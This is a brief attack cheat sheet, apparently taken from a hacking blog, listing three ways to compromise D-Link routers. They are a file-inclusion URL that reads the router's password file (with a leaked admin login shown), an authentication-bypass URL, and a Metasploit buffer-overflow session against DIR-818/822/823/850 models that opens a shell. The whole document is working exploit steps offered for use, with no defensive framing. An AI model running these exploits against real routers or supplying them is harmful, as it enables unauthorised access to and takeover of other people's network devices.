DLink router attack

SOURCE: http://hackwithbrain.blogspot.co.id/2016/01/remote-d-link-router-attack.html

OPTION1:

go to http://ip:8080/model/__show_info.php?REQUIRE_FILE=/var/etc/httpasswd

L: admin

P: TestingR2

OPTION2:

go to https://ip:port/tools_admin.php?NO_NEED_AUTH=1&AUTH_GROUP=0

OPTION3

SOURCE: https://www.exploit-db.com/exploits/40805/

This from LAN

# msfconsole

msf > use exploit/linux/http/dlink_hnap_login_bof

msf exploit(dlink_hnap_login_bof) > show options

Module options (exploit/linux/http/dlink_hnap_login_bof):

   Name      Current Setting  Required  Description

   —-      —————  ——–  ———–

   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][…]

   RHOST                      yes       The target address

   RPORT     80               yes       The target port

   SHELL     /bin/sh          yes       Don’t change this

   SHELLARG  sh               yes       Don’t change this

   SLEEP     0.5              yes       Seconds to sleep between requests (ARM only)

   SRVHOST   0.0.0.0          yes       IP address for the HTTP server (ARM only)

   SRVPORT   3333             yes       Port for the HTTP server (ARM only)

   SSL       false            no        Negotiate SSL/TLS for outgoing connections

   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)

   URIPATH                    no        The URI to use for this exploit (default is random)

   VHOST                      no        HTTP server virtual host

Exploit target:

   Id  Name

   —  —-

   0   Dlink DIR-818 / 822 / 823 / 850 [MIPS]

msf exploit(dlink_hnap_login_bof) > set rhost TARGETIP

msf exploit(dlink_hnap_login_bof) > run